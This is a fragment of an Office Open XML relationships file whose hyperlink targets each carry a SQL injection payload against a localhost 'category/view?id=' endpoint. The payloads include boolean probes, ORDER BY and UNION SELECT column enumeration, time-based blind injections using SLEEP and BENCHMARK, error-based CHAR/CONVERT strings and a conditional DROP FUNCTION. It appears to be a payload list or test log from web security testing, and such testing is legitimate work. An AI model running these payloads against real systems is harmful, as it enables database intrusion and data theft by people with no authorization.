Target="http://localhost:9999/category/view?id=3AnD%20SLEEP(5)--" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),%22'3" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=0%23" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--%20" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--%20" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2%23" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2017%23%20" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=1%20AND%20'%25'='" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10%23" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId45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--%20" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="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" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=1" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2017--%20" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5%23" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2028%23%20" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2020%20" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,1,1))='X'" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22" TargetMode="External"/><Relationship Id="rId42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--%20" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))%23" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=0%23" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2028--%20" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8--%20" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4--%20" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337%20" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),4%23" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--%20" TargetMode="External"/><Relationship Id="rId43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,NULL--%20" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=1%23" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20" TargetMode="External"/><Relationship Id="rId49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" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--%20" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%208%23%20" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337%23" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=y%23" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12%23" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15%23" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--%20" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4%23" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%208--%20" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2019%23%20" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2011%20" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207506=9091%20AND%20('5913=5913" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))%23" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=1%23" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23" TargetMode="External"/><Relationship Id="rId47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%23" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2019--%20" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2022%20" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10--%20" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7%23" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%25'%20AND%208310=8310%20AND%20'%25'='" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24" TargetMode="External"/><Relationship Id="rId428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--%20" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3--%20" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207506=9091%20AND%20(5913=5913" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2030--%20" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3IF(7423=7423)%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6--%20" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2010%23%20" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6%23" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3%23" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--%20" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25" TargetMode="External"/><Relationship Id="rId45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--%20" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=1--" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%202%20" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23" TargetMode="External"/><Relationship Id="rId49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" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2021%23%20" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),4" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17%23" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20USER()--%20" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2010--%20" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2013%20" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6%23" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2021--%20" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3'%5C%22" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 